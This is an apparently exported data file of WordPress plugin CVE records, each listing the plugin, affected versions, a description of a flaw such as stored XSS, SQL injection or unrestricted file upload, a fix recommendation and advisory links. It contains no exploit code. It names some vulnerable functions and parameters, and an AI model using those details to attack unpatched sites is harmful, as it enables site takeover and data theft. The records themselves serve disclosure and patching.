{"CVE_ID":"CVE-2023-0173","slug":"wpfunnels","versionEndExcluding":"2.6.9","description":"The Drag & Drop Sales Funnel Builder for WordPress plugin before 2.6.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c543b6e2-a7c0-4ba7-a308-e9951dd59fb9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c543b6e2-a7c0-4ba7-a308-e9951dd59fb9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0824","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.8","versionEndExcluding":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Anything functionality in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026499\\\/exclusive-addons-for-elementor\\\/trunk\\\/extensions\\\/link-anything.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026499\\\/exclusive-addons-for-elementor\\\/trunk\\\/extensions\\\/link-anything.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0823","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.8","versionEndExcluding":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' url in carousels in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026499\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/logo-carousel\\\/logo-carousel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026499\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/logo-carousel\\\/logo-carousel.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4002","slug":"wp-carousel-free","versionImpact":"2.6.8","versionEndExcluding":"2.6.9","description":"The Carousel, Slider, Gallery by WP Carousel  WordPress plugin before 2.6.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298b51ec-afad-4bc1-968d-76c59e55fc05\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298b51ec-afad-4bc1-968d-76c59e55fc05\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7019","slug":"wp-maintenance-mode","versionImpact":"2.6.8","versionEndExcluding":"2.6.9","description":"The LightStart \u2013 Maintenance Mode, Coming Soon and Landing Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the insert_template function in all versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to change page designs.","recommendation":"Update to version 2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b57d3d1d-dcdb-4f11-82d8-183778baa075?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b57d3d1d-dcdb-4f11-82d8-183778baa075?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013229\\\/wp-maintenance-mode\\\/trunk\\\/includes\\\/classes\\\/wp-maintenance-mode-admin.php?contextall=1&old=2922691&old_path=%2Fwp-maintenance-mode%2Ftrunk%2Fincludes%2Fclasses%2Fwp-maintenance-mode-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013229\\\/wp-maintenance-mode\\\/trunk\\\/includes\\\/classes\\\/wp-maintenance-mode-admin.php?contextall=1&old=2922691&old_path=%2Fwp-maintenance-mode%2Ftrunk%2Fincludes%2Fclasses%2Fwp-maintenance-mode-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7203","slug":"smart-forms","versionImpact":"2.6.86","versionEndExcluding":"2.6.87","description":"The Smart Forms WordPress plugin before 2.6.87 does not have authorisation in various AJAX actions, which could allow users with a role as low as subscriber to call them and perform unauthorised actions such as deleting entries. The plugin also lacks CSRF checks in some places which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as deleting entries.","recommendation":"Update to version 2.6.87, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b514b631-c3e3-4793-ab5d-35ed0c38b011\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b514b631-c3e3-4793-ab5d-35ed0c38b011\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4389","slug":"crawlomatic-multipage-scraper-post-generator","versionImpact":"2.6.8.1","versionEndExcluding":"2.6.8.2","description":"The Crawlomatic Multipage Scraper Post Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the crawlomatic_generate_featured_image() function in all versions up to, and including, 2.6.8.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.6.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/crawlomatic-multisite-scraper-post-generator-plugin-for-wordpress\\\/20476010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/crawlomatic-multisite-scraper-post-generator-plugin-for-wordpress\\\/20476010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1283e839-8588-4a76-9c1e-61562526166d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1283e839-8588-4a76-9c1e-61562526166d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8615","slug":"wp-jobsearch","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the jobsearch_location_load_excel_file_callback() function in all versions up to, and including, 2.6.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd718d44-4921-4deb-af5a-43e5f3926914?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd718d44-4921-4deb-af5a-43e5f3926914?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8614","slug":"wp-jobsearch","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the jobsearch_wp_handle_upload() function in all versions up to, and including, 2.6.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7832f8fe-2b41-4cfb-a734-db4ec88d91a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7832f8fe-2b41-4cfb-a734-db4ec88d91a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11925","slug":"wp-jobsearch","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.6.7. This is due to the plugin not properly verifying a users identity when verifying an email address through the user_account_activation function. This makes it possible for unauthenticated attackers to log in as any user, including site administrators if the users email is known.","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04bc8101-2676-4695-a498-f79be8221617?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04bc8101-2676-4695-a498-f79be8221617?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10111","slug":"watu","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"A vulnerability was found in Watu Quiz Plugin up to 2.6.7 on WordPress. It has been rated as critical. This issue affects the function watu_exams of the file controllers\/exam.php of the component Exam Handler. The manipulation of the argument quiz leads to sql injection. The attack may be initiated remotely. Upgrading to version 2.6.8 is able to address this issue. The name of the patch is bf42e7cfd819a3e76cf3e1465697e89f4830590c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230651.","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/watu\\\/commit\\\/bf42e7cfd819a3e76cf3e1465697e89f4830590c\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/watu\\\/commit\\\/bf42e7cfd819a3e76cf3e1465697e89f4830590c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230651\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230651\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230651\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230651\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2643","slug":"UNKNOWN-CVE-2023-5509-1","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"The Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any   WordPress plugin before 2.6.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/194ebf81-8fe4-4c74-8174-35d0ac00ac93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/194ebf81-8fe4-4c74-8174-35d0ac00ac93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3460","slug":"ultimate-member","versionEndExcluding":"2.6.7","description":"The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/694235c7-4469-4ffd-a722-9225b19e98d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/694235c7-4469-4ffd-a722-9225b19e98d7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.wpscan.com\\\/hacking-campaign-actively-exploiting-ultimate-member-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.wpscan.com\\\/hacking-campaign-actively-exploiting-ultimate-member-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0437","slug":"password-protected","versionImpact":"2.6.6","versionEndExcluding":"2.6.7","description":"The Password Protected \u2013 Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the API. This makes it possible for authenticated attackers, with subscriber access or higher, to extract post titles and content, thus bypassing the plugin's password protection.","recommendation":"Update to version 2.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034934%40password-protected%2Ftrunk&old=3005632%40password-protected%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034934%40password-protected%2Ftrunk&old=3005632%40password-protected%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1857","slug":"woo-gift-cards-lite","versionImpact":"2.6.6","versionEndExcluding":"2.6.7","description":"The Ultimate Gift Cards for WooCommerce \u2013 Create, Redeem & Manage Digital Gift Certificates with Personalized Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the wps_wgm_preview_email_template(). This makes it possible for unauthenticated attackers to read password protected and draft posts that may contain sensitive data.","recommendation":"Update to version 2.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b0d0c44-0ee8-400b-a4ea-e5520c2a6710?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b0d0c44-0ee8-400b-a4ea-e5520c2a6710?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3046745%40woo-gift-cards-lite&new=3046745%40woo-gift-cards-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3046745%40woo-gift-cards-lite&new=3046745%40woo-gift-cards-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10936","slug":"string-locator","versionImpact":"2.6.6","versionEndExcluding":"2.6.7","description":"The String locator plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.6.6 via deserialization of untrusted input in the 'recursive_unserialize_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must perform a search and replace action to trigger the exploit.","recommendation":"Update to version 2.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/string-locator\\\/trunk\\\/includes\\\/Extension\\\/SearchReplace\\\/Replace\\\/class-sql.php#L170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/string-locator\\\/trunk\\\/includes\\\/Extension\\\/SearchReplace\\\/Replace\\\/class-sql.php#L170\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222952\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222952\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1404f034-2d1d-44b2-87e5-61f72f215417?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1404f034-2d1d-44b2-87e5-61f72f215417?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7048","slug":"mystickymenu","versionImpact":"2.6.6","versionEndExcluding":"2.6.7","description":"The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the export of a CSV file containing contact leads via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Because the CSV file is exported to a public location, it can be downloaded during a very short window of time before it is automatically deleted by the export function.","recommendation":"Update to version 2.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be0ab40f-cff7-48bd-8dae-cc50af047151?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be0ab40f-cff7-48bd-8dae-cc50af047151?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016780\\\/mystickymenu\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016780\\\/mystickymenu\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3068","slug":"custom-field-suite","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cfs[fields][*][name]' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ab546cc-b099-4d26-bf42-785952fcfd8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ab546cc-b099-4d26-bf42-785952fcfd8c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/templates\\\/field_html.php?order=date&desc=1#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/templates\\\/field_html.php?order=date&desc=1#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3080330%40custom-field-suite%2Ftrunk&old=3042177%40custom-field-suite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3080330%40custom-field-suite%2Ftrunk&old=3042177%40custom-field-suite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8910","slug":"ht-mega-for-elementor","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.5 via the render function in includes\/widgets\/htmega_accordion.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09fb88e4-4846-40d3-8a79-a6a867bfb59f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09fb88e4-4846-40d3-8a79-a6a867bfb59f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156058\\\/ht-mega-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156058\\\/ht-mega-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13100","slug":"woo-ups-pickup","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The OPSI Israel Domestic Shipments WordPress plugin through 2.6.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9261010-ab55-4d18-8fd2-2003f8692ae8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9261010-ab55-4d18-8fd2-2003f8692ae8\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9261010-ab55-4d18-8fd2-2003f8692ae8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9261010-ab55-4d18-8fd2-2003f8692ae8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0709","slug":"cryptocurrency-price-ticker-widget","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The Cryptocurrency Widgets \u2013 Price Ticker & Coins List plugin for WordPress is vulnerable to SQL Injection via the 'coinslist' parameter in versions 2.0 to 2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cryptocurrency-price-ticker-widget\\\/trunk\\\/includes\\\/ccpw-db-helper.php?rev=3003658#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cryptocurrency-price-ticker-widget\\\/trunk\\\/includes\\\/ccpw-db-helper.php?rev=3003658#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6987","slug":"string-locator","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The String locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sql-column' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This required WP_DEBUG to be enabled in order to be exploited.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e0140e-ac24-48c6-aea0-bb0da203a817?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e0140e-ac24-48c6-aea0-bb0da203a817?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139143\\\/string-locator\\\/tags\\\/2.6.6\\\/includes\\\/Extension\\\/SQL\\\/views\\\/editor\\\/sql.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139143\\\/string-locator\\\/tags\\\/2.6.6\\\/includes\\\/Extension\\\/SQL\\\/views\\\/editor\\\/sql.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8541","slug":"woo-discount-rules","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The Discount Rules for WooCommerce \u2013 Create Smart WooCommerce Coupons & Discounts, Bulk Discount, BOGO Coupons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.6.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a site administrator into performing an action such as clicking on a link. Please note that this is only exploitable when the 'Leave a Review' notice is present, which occurs after 100 orders are made and disappears after a user dismisses the notice.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3529044f-c3d8-4370-8ba5-9df0fb71ab3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3529044f-c3d8-4370-8ba5-9df0fb71ab3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149013\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149013\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-discount-rules\\\/tags\\\/2.6.5\\\/v2\\\/App\\\/Views\\\/Admin\\\/review-notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-discount-rules\\\/tags\\\/2.6.5\\\/v2\\\/App\\\/Views\\\/Admin\\\/review-notice.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10960","slug":"brizy","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'storeUploads' function in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222672\\\/brizy\\\/tags\\\/2.6.5\\\/editor\\\/zip\\\/archiver.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222672\\\/brizy\\\/tags\\\/2.6.5\\\/editor\\\/zip\\\/archiver.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f0c85f4-07ae-4a2b-bd82-93467e7d9325?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f0c85f4-07ae-4a2b-bd82-93467e7d9325?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
